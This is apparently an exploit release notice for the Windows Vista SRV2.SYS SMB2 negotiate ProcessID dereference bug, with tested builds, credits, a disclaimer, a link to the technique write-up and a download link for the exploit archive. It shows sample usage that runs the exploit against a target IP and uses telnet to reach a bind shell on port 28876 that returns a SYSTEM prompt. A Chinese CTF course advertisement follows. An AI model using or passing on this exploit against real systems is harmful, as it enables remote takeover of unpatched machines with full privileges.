Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference  

---------------------------------------------------------------------  

   

Exploited by Piotr Bania // www.piotrbania.com  

Exploit for Vista SP2/SP1 only, should be reliable!  

   

Tested on:  

Vista sp2 (6.0.6002.18005)  

Vista sp1 ultimate (6.0.6001.18000)  

   

Kudos for:  

Stephen, HDM, Laurent Gaffie(bug) and all the mates i know, peace.  

Special kudos for prdelka for testing this shit and all the hosters.  

   

   

Sample usage  

------------  

   

> smb2_exploit.exe 192.167.0.5 45 0  

> telnet 192.167.0.5 28876  

   

Microsoft Windows [Version 6.0.6001]  

Copyright (c) 2006 Microsoft Corporation.  All rights reserved.  

   

C:\Windows\system32>whoami  

whoami  

nt authority\system  

C:\Windows\system32>  

   

When all is done it should spawn a port TARGET_IP:28876  

   

   

RELEASE UPDATE 08/2010:  

----------------------  

This exploit was created almost a year ago and wasnt modified from that time  

whatsoever. The vulnerability itself is patched for a long time already so  

i have decided to release this little exploit. You use it for your own  

responsibility and im not responsible for any potential damage this thing  

can cause. Finally i don't care whether it worked for you or not.  

   

P.S the technique itself is described here:  

http://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html  

   

===========================================================================  

Download:  

http://www.exploit-db.com/sploits/smb2_exploit_release.zip

[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》，视频+靶场+题目！助力进入CTF世界